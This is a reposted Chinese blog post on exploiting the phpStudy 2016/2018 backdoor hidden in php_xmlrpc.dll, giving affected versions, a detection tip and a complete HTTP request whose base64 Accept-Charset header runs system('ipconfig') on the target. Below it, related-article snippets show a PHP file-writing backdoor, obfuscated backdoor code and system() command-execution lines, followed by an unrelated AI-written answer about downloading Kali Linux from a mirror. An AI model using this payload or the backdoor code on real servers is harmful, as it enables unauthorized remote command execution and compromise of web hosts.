2021-10-07php后门利用(转自https://blog.youkuaiyun.com/god_zzZ/article/details/101678748)

最新推荐文章于 2025-03-31 17:18:58 发布
最新推荐文章于 2025-03-31 17:18:58 发布
阅读量285 收藏
点赞数
分类专栏: WEB渗透学习 文章标签: https php
原文链接:https://blog.youkuaiyun.com/god_zzZ/article/details/101678748
版权

【研究】PHPstudy后门利用

1.环境

测试的是这两个版本
phpStudy_2016.11.03 后门版
PhpStudy20180211 后门版

PhpStudy软件对于国内众多开发者而言,并不陌生。它是一款免费的PHP调试环境的程序集成包,集成了最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接使用,具有PHP环境调试和PHP开发功能。因为免费公益、简易方便,现已发展到一定的规模,有着近百万PHP语言学习者、开发者用户。

2.原理

程序包自带PHP的php_xmlrpc.dll模块隐藏有后门

3.影响版本

phpStudy20161103版本:

php5.4.45与php5.2.17

phpStudy20180211版本:

php5.4.45与php5.2.17

4.后门检测

下载对应版本,启动对应版本

检查一下后门文件有没有
位置:

xxxx\phpstudy\PHPTutorial\php\php-5.2.17\ext
我用的是这个版本
xxxx\phpstudy\PHPTutorial\php\php-5.4.45\ext
找到目录下的php_xmlrpc.dll文件
在这里插入图片描述
打开搜索eval关键字:
在这里插入图片描述
这就算是存在

5.漏洞利用

然后随便访问一个php文件
抓包改掉请求头字段:

accept-Encoding中逗号后面的空格要去掉
Accept-Charset为system('ipconfig')的base64编码

    
    
    
    
  • 1
  • 2

改完

accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

    
    
    
    
  • 1
  • 2

在这里插入图片描述

GET / HTTP/1.1
Host: 10.77.0.100
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

    
    
    
    
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
Python编程初学者必读:生成PHP后门病毒的完整指南
weixin_43263566的博客
05-31 443
Python编程初学者必读:生成PHP后门病毒的完整指南
php后门程序
03-27
老板不发工资怎么办,客户拿了源码,不付尾款怎么办,该后门旨在维护开发者的合法权益,请谨慎使用
又一款超强PHP后门
xiaoshan812613234的专栏
11-14 767
$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST["z2"]; $buf = ""; for ($i = 0; $i strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2)); @fwrite(fopen($f, "w") , $buf);
PHP回调后门
最新发布
2302_78023827的博客
03-31 309
1.系统命令执行 直接windows或liunx命令 各个程序 相应的函数 来实现2.执行代码 eval assert php代码 系统简单的测试。
PHP后门
qq_39751956的博客
07-08 417
简单的后门解析,密文都会明确以下方法,说白了就是字符串下标字符拼接//$c(原文经过strtr置换后的密文,由 目标字符+替换字符+base64_encode(‘原文内容’)构成)//strtr//substr//52(这个值不一定)//urldecode解析过的字符串提示:以下是本篇文章正文内容,下面案例仅供参考。
那些强悍的PHP一句话后门
Mhui
03-20 2333
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: 01 <!DOCT
php-x ip bus,手把手教你编写一个简单的PHP模块形态的后门
weixin_30151565的博客
03-09 621
看到Freebuf 小编发表的用这个隐藏于PHP模块中的rootkit,就能持久接管服务器文章,很感兴趣,苦无作者没留下PoC,自己研究一番,有了此文0×00. 引言PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现。由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 1467
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
常见的php后门,有趣的PHP后门
weixin_39678089的博客
04-08 617
前言最近我研究了一种不寻常的小技巧,特地撰写这篇文章来与大家分享。这篇文章提供了许多后门代码中使用的exit()基础知识,开箱即用。这篇文章的关注点在于全局变量GET,POST,REQUEST。最常用的函数(PHP 4, PHP 5, PHP 7)shell_exec - Execute command via shell and return the complete output as a s...
php 程序留后门,PHP后门程序
weixin_33376592的博客
03-17 467
*{font-size: 12px;}a{text-decoration: none; color: blue;}a:hover{text-decoration: underline; color:red;}$folder_count = $file_count = 0;function deleteAll($directory, $empty = false) {global $folder_c...
php程序怎么植入后门,网站被植入后门代码
weixin_29860267的博客
03-27 518
代码如下 有哪位大神告诉下这代码大概的含义 这玩意每天把我index.php加入一段彩票代码$sr = "st" . /*+/*+*/"rr" /*+/*+*/ . "ev";$id = $sr/*+/*+*/("ri" . "d_" . "si");$rn = $sr/*+/*+*/("em" . "an" . "er");$dn = $sr/*+/*+*/("em" . "anr" . "id...
php万能后门程序
09-11
php万能后门操作类,放如任何php程序中即可使用!
PHP设置后门保护代码的亲身经历
Li91314的博客
07-10 366
只有这样,我们才能确保自己的网站在日益复杂的网络环境中安全、稳定地运行。那天,我收到了一封来自服务器的警报邮件,说网站可能存在安全风险。这让我意识到,我的网站可能存在后门,被攻击者利用。通过这些措施的实施,我成功地保护了我的网站免受恶意攻击。只有不断学习、不断实践、不断完善自己的安全措施,才能确保网站的安全和稳定。但在这个过程中,我意识到,仅仅关闭后门是不够的,更重要的是要预防类似的事情再次发生。直到有一次,我负责维护的一个小型网站遭遇了恶意攻击,我才深刻意识到保护代码的重要性。
这不是你所常见的PHP大马后门分析
Adminxe的博客
05-06 570
PHP大马后门分析 PHP大马 PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。 分析大马文件 打开下载的php大马,可以看出该大马是经过加密了...
如何找到PHP授权软件中的后门
爱酷码的博客
04-29 912
对于很多靠卖PHP程序养家糊口的人来说,授权是必不可少的一部分,为了防止被他人恶意破解,通常还会加入一些后门留一手,可我们这种正版用户就不答应了,凭什么我付费买的程序居然还留着一个后门,万一哪天有Bug那我不就GG了么? 一.远程代码执行后门 这个相信大家都很熟悉了,eval等等函...
php源码查后门,某一次排查源码后门的过程
weixin_39762856的博客
03-10 4539
源码藏后门这种事情,屡见不鲜了。文件包含,文件调用,拼接,大小马,htaccess文件做手脚等等………不过今天我就遇到个奇葩,藏了后门还不承认,非说是程序自带的。给大家看看程序结构先。我检查了我所知道的一切后门方式。也用扫描器查找了一般,以为安全了直接上服务器部署好了,域名解析开始使用。第二天,莫名其妙登录日志有其他人了。也没太在意,觉得应该是自己登录路径和密码设的不够复杂,被人试出来了。改了一下...
【Web漏洞】命令执行
weixin_51614272的博客
02-23 1915
命令执行system命令命令同cat功能的函数绕过空格 system命令 1=system("ls /"); //查找根目录 1=system("ls ./"); //查找当前目录 1=system("ls ../"); //查找上一级目录 1=system("tac ../flag.php"); //打印上一级目录的falg.php 1=system("cp fla?.php 1.txt");//将fla?.php文件复制到1.txt 通配符? 和* 1=system("cp f*.php 1.txt")
eval函数简介与PHP一句话木马剖析
weixin_44706754的博客
04-19 2094
eval函数简介与PHP一句话木马剖析 一、eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 二、eval函数的一般用法 <?php $string = "beautiful"; ...
怎么使用php后门,PHP后门的一些用法
weixin_36078790的博客
03-29 569
今天我们说一些最常见的PHP后门的一些用法首先,写一个最简单的后门,也可以叫做木马。
如果我从该网址https://mirrors.tuna.tsinghua.edu.cn/kali-images/中完成操作呢?有什么需要注意的?以及使用该网址的好处。
03-18
<think>好的,用户之前询问了如何将Kali Linux安装到U盘,现在他们跟进了一个新问题,关于使用清华镜像站(https://mirrors.tuna.tsinghua.edu.cn/kali-images/)进行操作时的注意事项和好处。我需要仔细分析他们的需求,并提供准确的信息。 首先,用户可能已经知道如何下载Kali ISO,但想了解使用特定镜像站点的信息。我需要确认清华镜像站是否提供官方的Kali镜像。根据之前的了解,清华镜像站是国内常用的开源镜像,可能提供Kali的镜像,但需要验证。然后,用户可能关心下载速度、可靠性以及使用该镜像的具体步骤。 接下来,需要注意用户提到的注意事项。比如,镜像的版本是否与官方同步,校验文件的完整性,以及下载路径是否正确。此外,用户可能不知道如何验证下载的ISO,需要指导他们进行校验和检查,比如使用SHA256SUM。 关于好处,主要在于下载速度更快,因为国内镜像通常比国外源快,同时带宽更稳定,适合大文件下载。另外,可能提供更友好的界面或文档支持,比如中文说明,这对国内用户有帮助。 用户可能还有一些隐含的问题,比如如何找到正确的下载路径,或者是否需要使用特定的工具进行下载。需要检查清华镜像站的结构,确认Kali镜像的存放位置,确保用户下载的是正确的文件,而不是其他版本或测试版。 另外,用户可能担心使用非官方镜像的安全性问题,需要强调清华镜像站的可信度,并提醒用户始终校验文件哈希值以确保完整性。 在回答结构上,应该先介绍使用该镜像的好处,然后分步骤说明如何操作,包括访问路径、下载方法、校验步骤,最后列出注意事项。这样结构清晰,用户能一步步跟随操作,避免遗漏重要步骤。 需要确认清华镜像站的Kali镜像是否支持持久化安装,或者是否有其他特殊配置。根据之前的回答,持久化存储需要调整分区,这部分是否因镜像源不同而改变?应该不影响,因为持久化是安装后的步骤,与镜像来源无关,但需要明确说明。 用户可能还关心使用镜像站后,系统更新是否可以从清华源加速,这时候可以提到后续配置软件源的方法,但可能超出当前问题范围,可以简要提及或提供参考链接。 最后,检查是否有常见的陷阱,如下载了错误的分支或版本,或者未验证文件导致安装失败。需要在注意事项中强调这些点,确保用户顺利完成操作。 总结回答的结构:好处、操作步骤(包括下载和校验)、注意事项。确保语言简洁,步骤明确,重点突出使用该镜像的优势和必须的验证步骤。</think>### 使用清华镜像站下载Kali Linux的优势及注意事项 清华大学开源软件镜像站([https://mirrors.tuna.tsinghua.edu.cn](https://mirrors.tuna.tsinghua.edu.cn))是国内知名的开源镜像平台,提供高速、稳定的Kali Linux镜像下载服务。以下是使用该站点的具体操作指南、优势及需注意的问题。 --- ### **一、使用清华镜像站的好处** 1. **下载速度更快** - 国内服务器可避免国际带宽限制,下载速度通常比Kali官方源快数倍。 2. **稳定性高** - 镜像站提供多节点支持,减少因网络波动导致的下载中断。 3. **节省时间与流量** - 适合频繁下载ISO或更新包(如渗透测试工具库)。 4. **支持校验文件完整性** - 提供配套的哈希校验文件(如`SHA256SUMS`),确保下载的ISO未被篡改。 --- ### **二、操作步骤(以清华镜像站为例)** #### **1. 访问Kali镜像目录** 直接进入Kali镜像路径: [https://mirrors.tuna.tsinghua.edu.cn/kali-images/](https://mirrors.tuna.tsinghua.edu.cn/kali-images/) 选择所需版本(如`kali-2024.x/`),找到ISO文件(如`kali-linux-2024.x-live-amd64.iso`)。 #### **2. 下载ISO文件** - **推荐工具**: 使用迅雷、IDM等多线程工具加速下载,或直接通过浏览器下载。 - **注意文件名**: 确保下载的是最新稳定版,避免选择`weekly-build`(测试版)。 #### **3. 验证文件完整性** - 下载同目录下的`SHA256SUMS`文件。 - 计算本地ISO的哈希值,与校验文件中的值比对: **Linux/macOS**: ```bash sha256sum kali-linux-2024.x-live-amd64.iso ``` **Windows**: 使用工具如[HashCheck](https://github.com/gurnec/HashCheck)或PowerShell命令: ```powershell Get-FileHash -Algorithm SHA256 kali-linux-2024.x-live-amd64.iso ``` --- ### **三、注意事项** 1. **镜像版本同步延迟** - 清华镜像站通常与Kali官方源同步较快(几小时内),但下载前建议检查文件日期是否与官网一致。 2. **仅提供镜像,不修改内容** - 镜像站仅托管文件,ISO内容与官方完全一致,无需担心植入后门。但仍需校验哈希值! 3. **兼容性问题** - 若需安装到U盘并启用**持久化存储**,需确保U盘容量足够(参考前文步骤)。 4. **网络权限限制** - 部分企业/学校网络可能屏蔽非标准端口,若下载失败,可尝试切换网络环境。 --- ### **四、后续建议** 1. **配置APT软件源** 安装完成后,可将Kali系统的软件源替换为清华镜像以加速更新: ```bash sudo sed -i 's|http://http.kali.org|https://mirrors.tuna.tsinghua.edu.cn/kali|g' /etc/apt/sources.list sudo apt update ``` 2. **定期更新镜像** 若长期使用U盘系统,建议每隔半年下载最新ISO,重新制作启动盘以获取安全补丁。 --- ### **总结** 通过清华镜像站下载Kali Linux,可显著提升下载效率并保障稳定性,尤其适合国内用户。关键操作在于: 1. 选择正确的ISO文件; 2. 严格校验哈希值; 3. 写入U盘时注意分区设置。 其他步骤与常规安装流程一致(参考前文指南)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值